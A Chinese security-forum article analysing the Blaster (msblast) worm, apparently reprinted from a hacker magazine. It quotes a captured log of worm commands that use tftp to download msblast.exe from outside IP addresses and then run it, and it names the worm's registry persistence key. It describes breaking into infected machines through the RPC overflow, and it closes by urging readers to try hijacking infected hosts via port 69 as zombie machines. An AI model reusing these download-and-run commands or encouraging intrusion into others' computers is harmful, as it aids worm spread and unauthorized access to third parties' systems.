[原创]对冲击波病毒的一点小研究

文章作者：冰血封情 [E.S.T]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

此文章已经在国家级光盘媒体《黑客X档案》发表，转载要注意版权！

最近“冲击波”病毒十分泛滥，其实RISING站点刚发布的时候，中国暗域网络的就转载了相关报道，所以在我的眼中，这东西已经没什么新鲜了。可是最近在浏览国外某著名安全站点，看见了一篇这样的文章，对我从全新的角度认识“冲击波”起了很大的作用。限于篇幅，冰血翻译整理如下：

通过对我的网络连接的监测，我发现了一种正在通过RPC DCOM溢出漏洞传播的新蠕虫病毒。
起初，我觉察到一连窜企图连接我的4444端口的命令，于是我做了一个小的监听，其结果如下：
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i
....并且它们还在继续尝试...
（译者注：具体TFTP的知识请查找《黑客X档案》以前相关文章）
如此，我利用RPC溢出，成功进入了企图和我建立连接的计算机，并且下载到了一个MSBLAST.exe，并且执行了它，它自动使我的计算机扫描108.41.62.1-255的135端口，然后蠕虫会在注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
中添加以下键值：
"windows auto update"="msblast.exe"


从这里看来，这位老大也许就是在比较早的时候发现“冲击波”蠕虫病毒的了，从他的文章不难看出，凡是中了该病毒的网络主机，基本都可以通过RPC溢出成功入侵。经过尝试，果不其然。至于以上的监听到的命令，你可以用NC监听相关端口得到（具体方法参考PYTON大虾写NC文章），也可以用KFSensor这款IDS得到（《黑客X档案》今年第5期《遭遇蠕虫NIMDA》）。
如果以上的您看不明白在另外一篇国内“绿盟科技”的安全公告中，冰血又得到了一个小知识，该公告我已经转载，所以你也可以在我的小站中国暗域网络（http://forum.hackway.net/）的病毒漏洞版面查阅到，文章中有这么一句：

蠕虫还会在本地的UDP/69端口上建立一个tftp服务器，用来向其他受侵害的系统上传送蠕虫的二进制程序msblast.exe。

这样补充了上面的外国高手所说的tftp -i 142.217.249.63 GET msblast.exe是怎么来的了。如此是否可以从69端口直接入侵、做肉机呢？嘿嘿，具体冰血没有试验，大家自己尝试尝试吧。